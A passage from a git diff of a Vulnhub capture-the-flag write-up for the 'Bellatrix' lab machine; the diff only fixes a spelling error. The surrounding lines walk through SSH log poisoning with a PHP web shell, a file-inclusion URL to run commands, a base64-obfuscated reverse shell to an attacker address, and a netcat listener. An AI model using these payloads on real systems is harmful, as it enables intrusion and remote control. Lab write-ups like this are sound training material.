Dasor/Vulnhub-Writeups/writeups/bellatrix.md

 ssh '<?php system($_GET[c]); ?>'@192.168.1.40
 ```

 Just enter whatever password you wish because the idea of this is injecting code on the log.
-Now if we also call the atribute c we can execute commands ex: ` http://192.168.1.40/ikilledsiriusblack.php?file=/var/log/auth.log&c=ls ` by pressing crtl+u we can see the response more clearly (at least in chrome).
+Now if we also call the attribute c we can execute commands ex: ` http://192.168.1.40/ikilledsiriusblack.php?file=/var/log/auth.log&c=ls ` by pressing crtl+u we can see the response more clearly (at least in chrome).
 Ok let's just inject the base64 shell then in my case `echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzLzc3NzcgMD4mMQo=" | base64 -d | bash`

 ```shell
  nc -lvp 7777